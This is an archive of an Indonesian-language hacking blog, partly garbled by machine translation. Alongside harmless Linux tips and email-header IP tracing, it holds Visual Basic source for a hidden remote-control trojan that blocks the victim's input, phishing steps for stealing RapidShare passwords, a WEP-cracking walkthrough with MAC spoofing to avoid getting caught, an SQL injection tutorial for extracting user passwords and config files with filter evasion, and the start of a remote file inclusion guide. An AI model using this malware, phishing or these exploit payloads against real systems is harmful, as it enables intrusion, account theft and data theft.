Archive for August, 2010

August 6, 2010

Bikin Trojan dengan VB

Visual Basic adalah bahasa pemrograman mudah mudah bahwa sebagian besar programmer canggih bahkan tidak membandingkannya dengan raksasa seperti C / Pascal / C + + / PERL etc.But serius paket punch karena kemudahan dalam pemrograman dan standar Wikipedia Program Trojan di VBprocedures.Earlier menulis tentang cara untuk mengunci keyboard dan mouse dengan menggunakan VB. Kali ini saya akan membahas tentang bagaimana menulis sebuah trojan sederhana di VB. Menulis Trojan yang jauh lebih mudah daripada kebanyakan orang berpikir. Semua itu benar-benar melibatkan dua aplikasi sederhana baik dengan kurang dari 100 baris kode. Aplikasi pertama adalah klien atau program yang satu pengguna tahu tentang. Yang kedua adalah server atau trojan “sebenarnya” bagian. Sekarang saya akan melalui apa yang Anda butuhkan untuk kedua dan beberapa contoh kode.

Server
Server adalah bagian dari program Trojan. Anda biasanya akan ingin hal ini menjadi sebagai tersembunyi mungkin sehingga rata-rata pengguna tidak dapat menemukannya. Untuk melakukan ini, Anda mulai dengan menggunakan

Private Sub Form_Load()
Me.Visible = False
End Sub

Ini sedikit kode membuat program yang tak terlihat dengan mata telanjang. Sekarang kita semua tahu bahwa tugas manajer adalah peskier sedikit. Jadi, untuk mendapatkan aplikasi kita tersembunyi dari yang sedikit lebih baik kita membuat kode kita terlihat seperti ini.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

Jadi sekarang, kami memiliki program yang hampir terlihat oleh pengguna rata-rata, dan hanya mengambil empat baris kode. Sekarang semua Anda berpikir bahwa tutorial ini sekarang juga sucks sehingga memungkinkan membuatnya jauh lebih baik dengan menambahkan fungsi untuk kami Trojan!
Hal pertama yang ingin kita lakukan adalah membuatnya mampu mendengarkan koneksi ketika beban. Jadi untuk melakukan ini kita perlu menambahkan Winsock Control. Aku bernama kontrol saya menang, tetapi Anda bisa nama Anda apa yang pernah.

Sekarang untuk membuatnya mendengarkan pada port 2945 ketika dijalankan Trojan kita membuat kode kita terlihat seperti ini.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2945
win.RemotePort = 455
win.Listen
End Sub

Kode ini akan mengatur port terbuka lokal untuk 2945 dan port yang mengirimkannya adalah 455. Jadi sekarang, kami memiliki program yang mendengarkan tetapi masih tidak melakukan apa pun rapi. Mari kita membuat blok masukan dari pengguna benar-benar ketika kita kirim ke!

Untuk melakukan hal licik kecil kita perlu menambahkan modul dengan kode berikut

Public Declare Function BlockInput Lib “user32″ (ByVal fBlock As Long) As Long

Kemudian kita menambahkan kode ini untuk membentuk :

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Kode dalam modul disebut windows API. Menggunakan file dll untuk melakukan tugas-tugas yang kita inginkan. Sekarang kode ini masih tidak akan memblokir masukan pengguna tetapi kami sangat dekat. Kita sekarang perlu program DoActions fungsi yang kita sebut pada form utama kami. Dalam kasus Anda bertanya-tanya kode yang kami tambahkan untuk membentuk melakukan dua hal yang berbeda. Sub pertama yang membuatnya begitu semua permintaan sambungan secara otomatis diterima. Sub kedua membuatnya jadi semua data secara otomatis diterima dan kemudian melewati semua data ke DoActions fungsi yang akan kita kode.

Untuk kode DoActions, kita ingin membuat fungsi publik pada modul. Jadi menambahkan kode ini untuk modul dan kita akan dilakukan dengan server dari Trojan!

Public Function DoActions(x As String)
Dim Action
Select Case x
Case “block”
Action = BlockInput(True)
End Select
End Function

Ok sekarang kami memiliki program yang saat data “blok” dikirim ke port 2945 akan memblokir input pengguna. Aku membuat pernyataan Select Case sehingga mudah untuk mengubah kode ini untuk kebutuhan Anda sendiri nantinya. Saya sarankan menambahkan fitur pemblokiran Anda sendiri. Untuk melakukan itu hanya memanggil fungsi BlockInput dengan argumen salah bukan benar.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2945
win.RemotePort = 455
win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Ingatlah untuk menambahkan kontrol winsock Anda dan nama untuk menang jika Anda menggunakan kode ini.

Itu semua ada di sisi server atau bagian Trojan itu. Sekarang ke Klien.

Klien

Klien akan menjadi apa Anda akan berinteraksi dengan. Anda akan menggunakannya untuk menyambung ke server jauh (trojan) dan kirim perintah. Karena kita membuat sebuah server yang menerima perintah dari “blok” memungkinkan membuat klien yang mengirim perintah “blok”.

Membuat formulir dan menambahkan Winsock Control, kotak teks, dan tiga tombol. Kotak Teks harus dinamai txtIP jika Anda ingin bekerja dengan kode ini. Selain itu, tombol Anda harus dinamai cmdConnect, cmdBlockInput, dan cmdDisconnect. Sekarang mari kita melihat kode tersebut akan kami gunakan untuk membuat Klien kami.

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2945
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub
Private Sub cmdBlockInput_Click()
Win.SendData “block”
End Sub

Itu adalah kode untuk klien. Semua hal ini adalah mendapatkan Alamat Ip dari txtIp dan terhubung ke remote pada port 2945. Kemudian ketika terhubung Anda dapat mengirim blok “” data ke blok dari masukan mereka.


August 6, 2010

Hack RapidShare

Apakah Anda lelah mencari account premium Rapidshare gratis. Apakah Anda tertipu oleh contest.Well premium account gratis rapidshare let me tell you satu hal yang mendapatkan account premium gratis rapidshare bukanlah job.In mudah artikel ini saya akan menunjukkan Anda? metode yang paling hacker gunakan untuk hack sebuah metode account.The rapidshare dikenal sebagai Phishing.

Berikut adalah contoh bagaimana phishing mail seperti:


Phishing scam
Di bawah ini saya menyebutkan procdure untuk hack account premium rapdishare.

Phishing Prosedur:

1.First semua halaman login palsu Rapidshare Download  ( Bikin sendiri )

2.Extract folder untuk melihat merasa dalam

3.Now membuat account pada setiap eg.www.110mb.com situs gratis hosting, dll http://www.ripway.com

4.Anda telah membuat account pada salah satu situs hosting gratis, hanya pergi ke file manager dan mengupload semua file ke dalamnya yang Anda download ..

5.kirim url halaman palsu kepada korban misalnya http://www.110mb.com/index.htm

login 6.Once korban melalui halaman rapidshare palsu, Anda akan mendapatkan password di. txt file
Hack Rapidshare account

selamat Mencoba ya….hohohoho….

August 6, 2010

Tips and Tricks Linux

Apakah Anda linux geek? Berikut adalah beberapa tips dan trik linux mutlak yang harus untuk alike.Lets pengguna baru dan berpengalaman melihat mereka-Lebih Linux Tips dan trik untuk Geeks dan pemula sama

Mempercepat hard drive Anda

Dapatkan transfer file lebih cepat dengan menggunakan transfer 32-bit pada hard drive Anda

Cukup tambahkan baris:

hdparm-c3 / dev / HDX

ke script.If bootup Anda menggunakan distro SuSE atau lainnya berdasarkan SYS V,

/ Sbin / init.d / boot.local

harus bekerja untuk Anda. Hal ini memungkinkan transfer 32-bit pada hard drive Anda. Pada beberapa sistem itu dapat meningkatkan kinerja transfer sebesar 75%. Untuk menguji mendapatkan kinerja Anda, ketik:

hdparm-t-T / dev / HDX

DOS-seperti perintah
Banyak orang pindah ke Linux karena mereka kehilangan stabilitas DOS tua yang baik. Dalam cahaya itu, banyak pengguna mengetik perintah DOS (yang berasal dari UNIX di tempat pertama) yang terlihat baik tapi penyebab kesalahan. Perintah .. “cd” di DOS adalah hal yang sah, tapi balks Linux. Hal ini karena “cd” adalah perintah, dan setiap parameter untuk perintah yang harus dipisahkan dari perintah oleh spasi. Hal yang sama berlaku untuk “cd /” ~ dan “cd”. Sebuah perbaikan cepat di sini.

Gunakan editor teks favorit Anda di direktori home Anda untuk mengedit file “bashrc”.. Periode ini ada pada tujuan, ini menyembunyikan file dari ls tampilan normal.

Tambahkan baris:

alias cd / = “cd /”
alias cd ~ = “cd ~”
alias cd ..= “cd ..”

Dan aku biasanya menambahkan …

alias md = “mkdir”
alias rd = “rmdir-i”
alias rm = “rm-i”

dan pertama saya dan alias masih favorit …

alias ls = “ls – color”

alias adalah alat yang kuat, dan dapat digunakan dalam script. bashrc serta dari baris perintah. Anda bisa, jika Anda ingin menghabiskan waktu, membuat kelompok sendiri perintah shell yang sesuai bagaimana Anda bekerja. file Selama Anda menempatkan mereka dalam Anda. bashrc, mereka akan berada di sana setiap kali Anda log in Catatan bahwa jika Anda sering log in sebagai root, Anda mungkin ingin mengcopy / home / username / .bashrc ke / root / .bashrc untuk menjaga diri Anda waras.

Mengatur zona waktu Anda
Zona di Linux diatur oleh link simbolik dari / etc] / 1 [localtime ke file dalam / usr / share / [zoneinfo 2] direktori yang sesuai dengan apa zona waktu Anda masuk Sebagai contoh, karena saya di South Australia, / etc / localtime adalah sebuah symlink ke / usr / share / zoneinfo / Australia / Selatan. Untuk mengatur link ini, ketik:

ln-sf .. / usr / share / zoneinfo / / zona / etc / localtime

Ganti / zona Anda dengan sesuatu seperti Australia / NSW atau Australia / Perth. Silahkan lihat di bawah direktori / usr / share / zoneinfo untuk melihat apa zona waktu yang tersedia.

1. Ini mengasumsikan bahwa usr / share / zoneinfo terhubung ke / etc / localtime karena sistem dalam Red Hat Linux.
2. Pada sistem lama, Anda akan menemukan bahwa / usr / lib / zoneinfo digunakan bukan / usr / share / zoneinfo. Lihat juga bagian kemudian “ waktu dalam beberapa aplikasi adalah”salah.

Bagaimana untuk melakukan backup dengan tar?
Anda dapat mantain daftar file yang Anda dengan membuat cadangan ke file dan tar saat Anda ingin.

tar czvf tarfile.tar.gz-T list_file

mana list_file adalah daftar sederhana tentang apa yang ingin Anda sertakan ke dalam tar

i.e:

/ Etc / smb.conf
/ Root / myfile
/ Etc / ppp (semua file ke dalam / etc / ppp direktori)
/ Opt / gnome / html / gnome-dev-info.html

Bagaimana menjaga komputer dari menjawab untuk melakukan ping?

sebuah “sederhana echo 1> / proc/sys/net/ipv4/icmp_echo_ignore_all” akan melakukan trik … untuk mengubahnya kembali, cukup

“Echo 0> / proc/sys/net/ipv4/icmp_echo_ignore_all”

thq..Broo…….

August 6, 2010

mengetahui alamat IP di Gmail / YahooMail / Hotmail

Bila Anda menerima email, Anda menerima lebih dari sekadar pesan. email ini dilengkapi dengan header yang membawa informasi penting yang dapat memberitahu di mana email itu dikirim dari dan mungkin yang mengirimkannya. Untuk itu, Anda perlu mencari alamat IP dari pengirim. Tutorial di bawah ini dapat membantu Anda menemukan alamat IP dari pengirim. Catatan bahwa ini tidak akan bekerja jika pengirim menggunakan server anonymous proxy.

Pertama-tama, alamat IP biasanya dapat ditemukan di header dikurung antara kurung kotak, misalnya, [129.130.1.1]

Mencari alamat IP di Gmail

* Masuk ke account Gmail Anda dengan username dan password Anda.
* Buka surat.
* Untuk menampilkan header email,
* Klik pada segitiga terbalik di samping Balas. Pilih Tampilkan Asli.
* Secara manual mencari alamat IP, lanjutkan ke 5.
* Carilah Received: from diikuti dengan alamat IP antara kurung siku [].

Received: from [69.138.30.1] by web4587.mail .***. yahoo.com

* Jika Anda menemukan lebih dari satu Diterima: dari pola, pilih salah satu yang terakhir.
* Melacak alamat IP pengirim

Mencari alamat IP di Yahoo! Mail

* Masuk ke account Yahoo! Mail dengan username dan password Anda.
* Klik Inbox atau folder manapun yang Anda menyimpan email Anda.
* Buka surat.
* Jika Anda tidak melihat header di atas pesan mail, berarti header Anda tidak ditampilkan. Untuk menampilkan header,

* Klik Opsi di sudut kanan atas
* Pada halaman Opsi Mail, klik Preferensi Umum
* Gulir ke bawah untuk Pesan mana Anda memiliki pilihan judul
* Pastikan bahwa Tampilkan semua header pada pesan yang masuk dipilih
* Klik tombol Simpan
* Kembali ke mail dan buka mail yang

* Anda akan melihat header yang sama seperti di atas

Atau jika Anda ingin secara manual mencari alamat IP, lanjutkan ke 6.

* Carilah Received: from diikuti dengan alamat IP antara kurung siku []. Di sini, itu adalah 202.65.138.109.

Yang menjadi alamat IP pengirim.

Jika ada banyak contoh Received: from dengan alamat IP, pilih alamat IP dalam pola terakhir. Jika tidak ada contoh dari Received: from dengan alamat IP, pilih alamat IP pertama di X-Berasal-IP.

* Track IP addess pengirim

Mencari alamat IP di Hotmail

* Masuk ke account Hotmail Anda dengan username dan password Anda.
* Klik pada tab Mail pada bagian atas.
* Buka surat.
* Jika Anda tidak melihat header di atas pesan mail, berarti header Anda tidak ditampilkan. Untuk menampilkan header,

* Klik Opsi di sudut kanan atas
* Pada halaman Opsi Mail, klik Mail Pengaturan Tampilan
* Dalam Header Pesan, membuat opsi pastikan Advanced diperiksa
* Klik tombol Ok
* Kembali ke mail dan buka mail yang

* Anda harus melihat header email sekarang.
* Secara manual mencari alamat IP, lanjutkan ke 7.
* Jika Anda menemukan sebuah header dengan X-Berasal-IP: diikuti dengan alamat IP, yaitu alamat IP pengirim

Hotmail header
Dalam hal ini alamat IP pengirim adalah [68.34.60.59].

* Jika Anda menemukan sebuah header dengan Received: from diikuti dengan proxy Gmail seperti ini

Hotmail header
Cari Received: from diikuti dengan alamat IP di dalam tanda kurung siku []

Dalam hal ini, alamat IP si pengirim [69.140.7.58].

* Atau lain jika Anda memiliki header seperti ini

Hotmail header
Cari Received: from diikuti dengan alamat IP di dalam tanda kurung siku [].

Dalam hal ini, alamat IP si pengirim [61.83.145.129] (Spam mail).

* Jika Anda memiliki beberapa Received: from header, menghilangkan orang yang telah proxy.anyknownserver.com.
* Melacak alamat IP pengirim

August 6, 2010

Hack Wifi Dengan ‘Backtrack’

Wifi atau Wireless Fidelity adalah nama sebuah teknologi jaringan nirkabel yang populer yang menggunakan gelombang radio untuk menyediakan Internet nirkabel berkecepatan tinggi dan koneksi jaringan (seolah-olah Anda didnt tahu ..), Wifi telah menjadi bagian integral dari kehidupan kita hari ini. Wifi dijamin menggunakan protokol WPA yang bermaksud untuk mengamankan Wireless LAN seperti Wired LAN oleh enkripsi data melalui gelombang radio, namun, telah menemukan bahwa WEP tidak aman seperti pernah believed.Now hampir semua orang bisa hack ke jaringan Wifi dengan menghasilkan yang berlaku dengan menggunakan kunci WEP Bactrack. Baca terus untuk mengetahui bagaimana ..

Disclaimer: Tutorial ini diberikan untuk tujuan pendidikan saja dan bahwa untuk setiap penyalahgunaan informasi ini, OKeh Brother,,,,

PENGATURAN UP KARTU DAN Konsol

Backtrack boot pada mesin virtual / laptop dan membuka perintah konsol dan ketik perintah seperti yang diberikan -

* Ifconfig

Ini sama Linux ipconfig, Anda akan melihat adapter jaringan di sistem anda. Lihat yang satu ini untuk Wi-Fi. Beberapa contoh adalah wlan0, wifi0, dll

* Airmon-ng

Perintah ini akan menginisialisasi pemantauan jaringan Wi-Fi & akan memberitahukan Anda berapa banyak jaringan dalam jangkauan

* Airmon-ng stop [Wi-Fi Kartu nama (tanpa tanda kutip)]

Perintah ini akan menghentikan siaran kartu dan resepsi segera

* Macchanger-mac [Diinginkan alamat MAC] [Wi-Fi kartu nama]

perintah ini akan mengubah alamat MAC saat ini ke alamat MAC yang Anda inginkan, sehingga Anda tidak tertangkap kemudian

* Airmon-ng start [Wi-Fi Kartu nama]

Anda akan melihat lagi adaptor tambahan yang ditetapkan pada mode monitor, gunakan adaptor untuk semua tujuan lebih lanjut dalam perintah-perintah berikut di mana – ‘[Wi-Fi kartu nama]‘ muncul

Paket Dumping

Setelah Anda telah mengatur semua parameter, Anda harus mengendus dan membuang paket-paket data dalam rangka untuk mendapatkan key.You dapat melakukannya dengan menggunakan perintah berikut. Pada perintah di konsol ketik perintah-perintah -

* Airodump-ng [Wi-Fi] kartu nama

Salin dan sisipkan BSSID di perintah berikut dan jalankan

* Airodump-ng-c [Channel Nomor]-w [Nama file yang diinginkan untuk] dekripsi kemudian – bssid [BSSID] [Wi-Fi] Kartu nama

Ketika Anda mengeksekusi perintah ini, Anda akan melihat sejumlah beacon dan paket data yang akan disimpan dalam nama file yang telah Anda berikan. File akan disimpan di root drive sistem (Klik Komputer dan Anda akan melihat file). File akan hadir dalam dua format: *. topi, *. txt.

Mempercepat HAL

Namun paket dumping merupakan proses yang cukup lambat, kita perlu untuk mempercepat hal-hal untuk menyimpan time.Open kami konsol baru setelah data paket pertama telah disimpan dan ketik perintah di konsol baru dan jalankan

airreplay-ng -1 0-a [BSSID]-h [pura-pura ALAMAT MAC]-e [nama Wi-Fi (Anda ingin hack)] [Wi-Fi kartu] nama

Saat Anda mengetik perintah ini, Anda akan melihat bahwa paket-paket data yang dibutuhkan untuk memecahkan kunci akan meningkat secara dramatis sehingga menghemat banyak waktu.

KUNCI mengungkapkan WEP

Buka konsol lain setelah Anda memiliki sekitar 20.000 paket data dan ketik perintah berikut untuk mengungkapkan kunci WEP.

aircrack-ng-n 64-b [BSSID] [Nama file tanpa ekstensi] Mengungkap Kunci WEP – rdhacker.blogspot.com

Saat Anda mengetik perintah ini, Anda akan melihat bahwa kunci akan muncul di depan Anda dalam format di bawah ini:

XX: XX: XX: XX

Hal ini tidak perlu bahwa kunci harus memiliki angka yang sama persis seperti yang ditunjukkan di atas jadi jangan panik jika Anda melihat 10 digit atau 14 tombol angka. Juga jika dekripsi gagal, Anda dapat mengubah tingkat bit dekripsi dalam perintah:

aircrack-ng-n [BIT TINGKAT]-b [BSSID] [Nama file tanpa] ekstensi

Ingat, tingkat sedikit harus sejumlah 2n dimana n: 1,2,3,4 …

umpamanya

aircrack-ng-n 32-b [BSSID] [Nama file tanpa] ekstensi

ATAU

aircrack-ng-n 128-b [BSSID] [Nama file tanpa ekstensi] dll dll

Sekarang hanya login menggunakan kunci WEP Anda punya.

nguaaantuukkkk….hixixix… Tiduur ahh…….

August 6, 2010

SQL Injection

Hello Broo…  Kali ini saya m posting injeksi sql , yang saya temukan cukup menarik untuk membaca dan permata SQL Injection – Belajar Attack untuk berbagi. SQL injection tutorial ini akan jelas yang paling Anda dari keraguan injeksi sql dan rapi akan tahap dalam strategi serangan untuk Anda.

SQL Injection didefinisikan oleh http://www.h-spot.net/threat_glossary.htm sebagai:

“Tindakan memasukkan data cacat atau tak terduga (mungkin dalam bentuk web front-end atau front-end aplikasi misalnya) sehingga database back-end SQL berjalan di belakang situs web atau aplikasi mengeksekusi perintah SQL yang programmer tidak pernah dimaksudkan untuk memungkinkan , mungkin memungkinkan penyusup untuk masuk ke atau kerusakan database. “

Informasi Latar Belakang

* Hal ini dianggap kelemahan web yang paling umum saat ini
* Ini adalah cacat dalam aplikasi web – bukan db, atau server
* Dapat disuntikkan ke: Cookie, Bentuk, dan parameter URL

Pelajaran Fakta

* Pelajaran ini menggunakan sintaks MySQL untuk semua contoh.
* Pelajaran ini tidak memberikan alasan mengapa situs rentan, hanya bagaimana mengeksploitasi mereka
* Pelajaran ini hanya menyediakan contoh injeksi sql untuk parameter url seperti itu adalah suatu subjek besar di itu sendiri
* Pelajaran ini memberikan contoh kecil dari teknik penggelapan filter

Pelajaran

Beberapa perintah Anda perlu mengetahui:

‘union all select’ : combines two or more select statements into one query and returns all rows

‘order by’ : used to sort rows after a select statement is executed

‘load_file()’ : loads a local file from the site or server examples would be .htaccess or /etc/passwd

‘char()’ : used to change decimal ascii to strings, can be used for filter evasion–in sql injections, used in conjunction with load_file

‘concat()’ : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)

‘—’ : a comment

‘/*’ : another type a comment

Query SQL Injection ke URL Parameter

Jadi Anda telah menemukan sebuah situs: ‘

http://www.site.com/index.php?id=5

dan ingin menguji apakah itu rentan terhadap Suntikan SQL. Mulailah dengan memeriksa apakah Anda dapat menjalankan beberapa query Anda sendiri, jadi coba:

/ Index.php? Id = 5 dan 1 = 0 -

Jika setelah menjalankan pernyataan di atas, apa-apa yang telah terjadi dan halaman masih tetap sama, Anda dapat mencoba:

/ Index.php? Id = ‘

Jika tidak kerja mereka, untuk tujuan tutorial ini pindah ke situs lain. Jika tidak, jika muncul halaman kosong yang baru saja Anda mungkin beruntung!

Sekarang kita ingin menemukan berapa banyak kolom dan mana yang menunjukkan ketika laporan pilih dijalankan maka kami menggunakan:

/ Index.php id = 5 order by 20?

Jika Anda mendapatkan penurunan kesalahan nomor 20, jika tidak ada kesalahan terus incrementing sampai Anda mendapatkan satu dan kemudian jumlah sebelum kesalahan Anda adalah jumlah kolom dalam tabel Anda memilih dari.

Contoh:

/ Index.php id = 5 order oleh 15 <? – Kembali tidak ada kesalahan, tetapi / index.php? Id = 5 order 16

kembali kesalahan, maka kita tahu bahwa terdapat 15 kolom dalam pernyataan pilih kami.

Pernyataan berikutnya akan null id = 5, sehingga script hanya mengeksekusi perintah kami dan tidak itu sendiri, dan menunjukkan kita yang kolom kita dapat mengekstrak data dari:

/ Index.php? Id = serikat null semua 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 pilih -

komentar komentar yang keluar apa script akan menambahkan ke akhir sehingga hanya pernyataan pernyataan kita memandang.

Jadi sekarang lihat halaman dan jika Anda melihat salah satu dari angka yang Anda hanya mengetik, Anda tahu kolom yang ditampilkan, dan kita bisa mengumpulkan informasi dari mereka. Untuk contoh ini, mari kita berpura-pura kolom 5, 7, dan 9 ditampilkan.

Sekarang kita dapat mulai mengumpulkan informasi!

/ Index.php? Id = serikat null semua 1,2,3,4 pilih, user (), 6, database (), 8, versi (), 10,11,12,1 3,14,15 -

Seperti yang dapat Anda lihat kami memilih nilai-nilai dari kolom yang menunjukkan, bagaimana jika kita ingin membersihkan ini sedikit, dan menempatkan semua nilai-nilai yang dipilih dalam satu kolom? Di sinilah penggabungan strings () muncul di:

/ Index.php? Id = serikat null semua 1,2,3,4 pilih, penggabungan strings (user (), char (58), database (), char (58), versi ()), 6,7,8, 9,10,11,12,13,14,15 -

Sekarang lihat pada halaman Anda, pengguna (), database (), dan versi () semua di satu tempat, dan dipisahkan oleh tanda titik dua ini menunjukkan penggunaan penggabungan strings () dan char ().

Pengguna () biasanya akan memberikan sesuatu seperti username @ localhost, tapi Anda mungkin beruntung dan mendapatkan username @ ipaddresshere, dalam hal ini Anda bisa mencoba untuk brute force login FTP. Versi yang akan membantu Anda mencari exploit untuk itu versi database () digunakan – tetapi hanya jika Anda skiddy sebuah!

Sebelum kita dapat memeriksa apakah kita telah perms load_file, kita harus mendapatkan FPD (Full Path Disclosure) agar kita tahu persis dimana file berada bahwa kita mencoba untuk membuka. Berikut adalah beberapa cara untuk mendapatkan FPD:

/ Index.php? Id [] =

Anda bisa mencoba Google path penuh kepada situs dengan mencoba sesuatu seperti “/ / sitename rumah” dan berharap bahwa Anda akan menemukan sesuatu di Google

Sesi Cookie Trick

Terima kasih kepada haZed di enigmagroup.org. Dalam jenis url:

‘Java script: void (document.cookie = “PHPSESSID =”);’

Ini akan memberikan session_start () error dan FPD.

Sekarang kita akan mencoba untuk menggunakan load_file (), contoh ini akan membuka file. Htaccess, pastikan Anda tahu file yang Anda coba untuk memuat benar-benar ada atau Anda dapat kehilangan kesempatan Anda untuk menyadari apa perms besar Anda telah:

/ Index.php? Id = serikat null semua 1,2,3,4 pilih, load_file (char (47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101 , 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112 , 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)) ,6,7,8,9,10,11,12,13,14,15 -

Jika Anda melihat file htaccess,. Congrats! Anda telah load_file () perms. Sekarang mencoba memuat menyertakan file seperti config.inc.php untuk username database dan password, berharap bahwa admin tersebut cukup bodoh menggunakan nama pengguna yang sama dan password untuk ftp. Ide lain akan memuat htpasswd setelah menemukan itu lokasi dari.. htaccess dan kemudian log in ke semua wilayah yang dilindungi sandi yang ingin Anda di situs.

Jika Anda tidak melihat file htaccess., Saya akan termasuk salah satu cara lain untuk ekstrak info dengan menggunakan suntikan sql.

Menggunakan information_schema.tables

Jadi Anda tidak memiliki load_file () perms? Tidak masalah, kami dapat memeriksa information_schema.tables.

1) ‘table_name’ adalah nama tabel yang ada pada seluruh tabel information_schema pada setiap situs:

/ Index.php? Id = serikat null semua 1,2,3,4 pilih, table_name, 6,7,8,9,10,11,12,13,14,15 dari information_schema.tables–

Jika situs menampilkan information_schema.tables, CHARACTER_SETS kata ” akan muncul dalam kolom 5. Apa yang dapat saya lakukan dengan CHARACTER_SETS Anda mungkin bertanya-tanya. Yah, tidak ada yang aku akan menunjukkan Anda, tetapi Anda bisa mencari tahu tabel lain yang ada di situs. The information_schema.tables berisi daftar setiap meja di database di situs, sehingga Anda dapat memperoleh nama pengguna meja dan mungkin password jika mereka ada … Lalu apa yang Anda pikir information_schema.columns terus? Itu benar, daftar semua kolom di situs. Jadi, daripada hanya menggunakan injeksi di atas Anda dapat mencoba salah satu dari berikut:

-/index.php? id = serikat null semua 1,2,3,4 pilih, table_name berbeda, 6,7,8,9,10,11,12,13,14,15 dari information_schema.tables-

Pilih semua ‘nama tabel yang berbeda’ dari information_schema.tables, yang berarti akan mencetak semua tabel pada satu waktu

-/index.php? id = serikat null semua 1,2,3,4 pilih, penggabungan strings (table_name, char (58), column_name), 6, 7,8,9,10,11,12,13,14, 15 dari information_schema.columns-

Pilih semua tabel dan kolom yang masing-masing pergi dengan tabel yang dipisahkan oleh titik dua

2) Jika tidak ada permintaan di atas memberikan apa-apa kecuali untuk ‘CHARACTER_SETS’ Anda harus menggunakan pencacahan untuk menentukan nama tabel lain:

/ Index.php? Id = serikat null semua 1,2,3,4 pilih, table_name, 6,7,8,9,10,11,12,13,14,15 dari information_schema.tables mana table_name! = “CHARACTER_SETS “-

Maka akan menampilkan tabel berikutnya sejalan sehingga Anda akan memodifikasi di atas untuk mengatakan:

mana table_name = “CHARACTER_SETS” dan table_name = “nexttableinline”!! -

Sampai ada tabel show, maka anda dapat melakukan hal yang sama untuk kolom.

3) Sekarang setelah Anda dieksekusi satu atau semua laporan keuangan tersebut, katakanlah Anda menemukan pengguna tabel ” dan memiliki username kolom ‘,’ password ‘,’ id ‘, dan’ email ‘. Untuk ekstrak yang info dari tabel, gunakan:

/ Index.php? Id = serikat null semua 1,2,3,4 pilih, penggabungan strings (username, char (58), password, char (58), id, char (58), email), 6,7,8 , 9,10,11,12,13,14,15 dari pengguna -

Dan Anda akan mendapatkan info yang Anda minta, tentu saja Anda dapat memodifikasi bahwa yang Anda inginkan seperti:

-/index.php? id = serikat null semua 1,2,3,4 pilih, nama pengguna, 6, sandi, 8,9,10,11,12,13,14,15 dari pengguna mana id = 1 -

-/index.php? id = serikat null semua 1,2,3,4 pilih, penggabungan strings (password, char (58), id, char (58), email), 6,7,8,9,10,11 , 12,13,14,15 dari pengguna dimana username = ‘Admin’

Mengganti Admin dengan nama pengguna seperti puncak dll admin atau pemilik.

Final Tips

Dengan sedikit keberuntungan, salah satu dari metode telah bekerja untuk Anda dan Anda mampu mencapai tujuan Anda. Namun, jika tidak ada dari mereka bekerja, Anda bisa mulai menebak nama tabel yang umum dan kemudian kolom:

/ Index.php? Id = serikat null semua 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 pilih dari pengguna

Jika halaman muncul, Anda tahu meja ada dan Anda bisa mulai menebak nama kolom:

/ Index.php? Id = serikat null semua 1,2,3,4 pilih, username, 6,7,8,9,10,11,12,13,14,15 dari pengguna

Jika Anda mendapatkan nama pengguna, pekerjaan yang baik Anda menebak sebuah meja yang benar dan kolom, dinyatakan tetap menebak-nebak.

Filter Pengelakan Teknik

* Anda dapat URL Encode karakter, hex menyandikan mereka, menggunakan penyandian yang Anda suka selama browser Anda dapat menafsirkannya
* Sebaliknya kemudian menggunakan ‘serikat semua pilih’ mencoba ‘Union Pilih semua’ untuk melihat apakah kasus cek filter
* Coba gunakan tanda plus untuk membagi kata atas: ” uni ‘+’ on ” + + ” semua ‘+’ ‘+’ + ‘lek Se’
* Kombinasikan metode yang disebutkan di atas menggunakan kasus yang berbeda, ditambah operator, dan bukan hanya teks tetapi juga encoding
* Jadilah kreatif

August 6, 2010

Remote File Inclusion (RFI)

RFI adalah singkatan dari Remote File Inklusi, dan memungkinkan penyerang untuk mengupload kode kustom / file berbahaya di situs Web atau server dengan menggunakan script. Sebuah kerentanan theprohack.comThe tutorial sederhana untuk Remote File Inclusion (RFI) – memanfaatkan cek validasi miskin di website dan akhirnya dapat menyebabkan eksekusi kode pada server atau kode eksekusi di website (serangan XSS menggunakan javascript). Kali ini, saya akan menulis tutorial sederhana pada Remote File Inklusi dan pada akhir tutorial, saya rasa Anda akan tahu apa itu adalah tentang bagaimana dan mungkin dapat menyebarkan serangan atau dua.

RFI adalah kerentanan umum, dan percayalah semua situs hacking tidak tepat tentang injeksi SQL. Menggunakan RFI Anda benar-benar bisa mendeface situs web, mendapatkan akses ke server dan melakukan hampir semua hal (termasuk tersedak mereka keluar atau minta .. baik itu berlebihan tapi aku rasa Anda mendapatkan ide: P). Apa yang membuat lebih berbahaya adalah bahwa Anda hanya perlu memiliki akal sehat dan pengetahuan dasar tentang PHP untuk menjalankan salah satu ini, beberapa BASH mungkin akan berguna karena sebagian besar saat ini adalah host server di Linux..

Oke .. Mari kita mulai .. Langkah pertama adalah menemukan situs yang rentan .. Anda dapat dengan mudah menemukan mereka menggunakan Google dorks .. Jika anda tidak mempunyai ide, Anda mungkin ingin membaca sandi tentang lanjutan dorks hacking menggunakan Google atau menggunakan alat otomatis untuk menerapkan dorks Google menggunakan Google. Sekarang mari kita asumsikan kita telah menemukan sebuah website yang rentan

http://example-saja.com/index.php?page=home

